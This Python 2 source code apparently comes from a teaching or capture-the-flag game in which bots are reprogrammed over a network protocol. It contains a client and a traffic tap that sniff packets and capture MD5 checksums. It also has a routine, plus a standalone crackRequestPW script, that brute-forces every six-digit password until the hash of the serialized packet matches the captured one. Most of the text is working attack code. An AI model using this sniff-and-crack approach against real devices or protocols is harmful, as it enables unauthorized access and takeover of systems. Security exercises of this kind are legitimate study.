def status(self, password, *subsystems): subsystems = map(ReprogrammingRequest.SUBSYSTEMS.index, subsystems) req = ReprogrammingRequest(RequestId=self.__nextId(), Opcode=1, Subsystems=subsystems, Data=[]) InsertChecksum(req, password=password) #self.__requests[req.RequestId] = Deferred() self.transport.write(req.__serialize__())
def reprogram(self, password, subsystem, data, *additionalSubsystems): if len(additionalSubsystems) % 2 != 0: raise Exception( "Arguments to reprogram is both a subsystem and the data") req = ReprogrammingRequest(RequestId=self.__nextId(), Opcode=0) subsystems = [subsystem] programs = [data] while additionalSubsystems: subsystems.append(additionalSubsystems.pop(0)) programs.append(additionalSubsystems.pop(0)) subsystems = map(ReprogrammingRequest.SUBSYSTEMS.index, subsystems) req.Subsystems = subsystems req.Data = programs InsertChecksum(req, password=password) #self.__requests[req.RequestId] = Deferred() self.transport.write(req.__serialize__())
def dataReceived(self, data): try: packet, bytesUsed = ReprogrammingRequest.Deserialize(data) packetType = "request" except: packet, bytesUsed = ReprogrammingResponse.Deserialize(data) packetType = "response" print "TAP received %d bytes from %s to %s, packetType: %s, checksum: %s" % ( len(data), self.transport.getPeer(), self.transport.getHost(), packetType, packet.Checksum) # resp, bytesUsed = ReprogrammingResponse.Deserialize(data) # wherReprogramme 's' is the string above # realChecksum = req.Checksum # should be 59a42a27f07347f94d5d9fa58fa51ba3 if packetType == "response": Checksum = data.split(" ")[9] print Checksum with open("serialized_data", "w") as f: f.write(Checksum) f.close() print "Extracted Checksum" if packetType == "request": time.sleep(0.5) print "Starting" f = open("serialized_data", "r") realChecksum = f.read() f.close() # reqPacket, bytesUsed = ReprogrammingRequest.Deserialize(reqData) for i in range(0, 999999): packet.Checksum = str(int(i)).zfill(6) testChecksum = md5.new(packet.__serialize__()).hexdigest() if realChecksum == testChecksum: print packet.Checksum print "Found password: %s" % str(int(i)).zfill(6) break print "Ended"
from bot.common.network import ReprogrammingRequest import md5 def crackRequestPW(msg): realChecksum = msg.Checksum for i in range(999999): pw = checkPw(msg, i, realChecksum) if pw: return pw def checkPw(msg, pwnum, realCS): pw = "0" * (6 - len(str(pwnum))) + str(pwnum) msg.Checksum = pw testChecksum = md5.new(msg.__serialize__()).hexdigest() if testChecksum == realCS: return pw if __name__ == "__main__": s = "+cyberward.botinterface.ReprogrammingRequest\x031.0\x00\x06\x00\x01\x00\x00\x00\x01\x00\x02\x00\x00\x00 59a42a27f07347f94d5d9fa58fa51ba3\x00\x03\x00\x00\x04\x00\x00\x00\x05\x00\x0b\x00\x00\x00\x01H\x00\x00\x00\x01E\x00\x00\x00\x01L\x00\x00\x00\x01L\x00\x00\x00\x01O\x00\x00\x00\x01 \x00\x00\x00\x01W\x00\x00\x00\x01O\x00\x00\x00\x01R\x00\x00\x00\x01L\x00\x00\x00\x01D\x00\x06\xff]o\xb7\xd3\xd8\x8f\xf4" req, bytesUsed = ReprogrammingRequest.Deserialize(s) print(crackRequestPW(req))